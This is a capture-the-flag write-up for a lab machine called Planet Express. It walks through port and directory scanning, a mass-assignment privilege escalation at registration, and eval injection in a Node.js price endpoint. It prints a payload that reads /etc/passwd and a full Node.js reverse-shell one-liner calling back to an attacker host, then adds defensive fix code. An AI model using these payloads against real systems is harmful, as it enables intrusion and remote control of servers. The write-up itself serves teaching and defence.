AppSecExplained

THM: Planet Express (Hard)

Fast, affordable, and out of this world!
This CTF is not yet available publicly, but hopefully soon!

Flag 1

Enumeration

We discover which ports are open and see 80 (HTTP) and 22 (SSH).
nmap 10.10.227.249
nmap results
We can scan for directories and leave that running while we explore the site manually.
ffuf -u http://10.10.227.249/FUZZ -w /usr/share/wordlists/dirb/common.txt
ffuf results
Browsing to /admin gives us an error.
access to /admin is denied
Register an account.
register an account
We still get access denied on the /admin endpoint, so we will try to create an account with admin privileges using mass assignment.

Exploitation

There are a number of combinations we can try, such as:
admin=true
admin=1
account=admin
account=administrator
privilege=admin
privilege=administrator
privs=true
privileges=admin
privileges=administrator
Writing a short script to generate potential payloads is the easiest way to do this, but given that the error message mentions "privilege" and "admin", we will focus on those.
creating an account and attempting mass assignment
We login to the account after it's created, and then try to access /admin.
/admin
We are successful! The first flag is given to us on the page.

Flag 2

Enumeration

Clicking "calculate price" updates the page with a number, and in our proxy we can see a POST request.
calculate price
/calculate-price

Exploitation

Sending modified requests indicates that the application may be passing the values into a function such as eval(): arithmetic such as +1 and -1 appended to a parameter is evaluated correctly rather than causing an error.
orderId=64294f0e569035c8dbe5cdb5&length=51&height=51&width=51&weight=5001
{"price":182661}
orderId=64294f0e569035c8dbe5cdb5&length=51&height=51&width=51&weight=5001-1
{"price":182660}
orderId=64294f0e569035c8dbe5cdb5&length=51&height=51&width=51&weight=5001/0
{"price":null}
We can test RCE with the following payload.
;fs=require('fs');fs.readFileSync('/etc/passwd').toString()
RCE
We can upgrade to a shell with the following payload.
;(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(4444, "<your-ip>", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/;})();
upgrading to a shell
catching the reverse shell
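As an added example (not code from the Planet Express challenge or this post), here is how the two bugs used above are typically fixed in a Node.js handler: an allowlist of registration fields so that a client-supplied privilege field is ignored, and strict numeric parsing of the price inputs so that arithmetic strings are rejected instead of evaluated. The field names, the limits and the price formula are assumptions.

```javascript
// Added example, not code from the Planet Express app. Field names, limits and
// the price formula are assumptions; the defensive patterns are the point.

// Fields a client is allowed to set when registering. Anything else in the body,
// such as privilege=admin or admin=true, is dropped rather than stored.
const ALLOWED_REGISTER_FIELDS = ["username", "email", "password"];

// Vulnerable pattern: the whole request body becomes the user record, so a
// client-supplied "privilege" key overrides the server default (mass assignment).
function buildUserUnsafe(body) {
  return Object.assign({ privilege: "user" }, body);
}

// Hardened: copy only allowlisted fields; the server alone decides the role.
function buildUserSafe(body) {
  const user = { privilege: "user" };
  for (const key of ALLOWED_REGISTER_FIELDS) {
    if (Object.prototype.hasOwnProperty.call(body, key)) {
      user[key] = body[key];
    }
  }
  return user;
}

// Strict numeric parsing for the /calculate-price inputs: only a plain decimal
// number within range is accepted, so strings such as "5001-1", "5001/0" or
// ";require('fs')..." are rejected instead of being handed to eval().
function parseNumber(value, max) {
  if (typeof value !== "string" || !/^\d+(\.\d+)?$/.test(value)) return null;
  const n = Number(value);
  return n >= 1 && n <= max ? n : null;
}

// Assumed formula: volume plus weight. Returns an error object on bad input.
function calculatePrice(params) {
  const length = parseNumber(params.length, 1000);
  const height = parseNumber(params.height, 1000);
  const width = parseNumber(params.width, 1000);
  const weight = parseNumber(params.weight, 10000);
  if ([length, height, width, weight].includes(null)) {
    return { error: "invalid input" };
  }
  return { price: length * height * width + weight };
}
```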
That's it! I hope you enjoyed the challenge and learned a bit about mass assignment and RCE in Node.js applications.
👍
If you like my content, please feel free to connect on LinkedIn or drop into one of our live streams!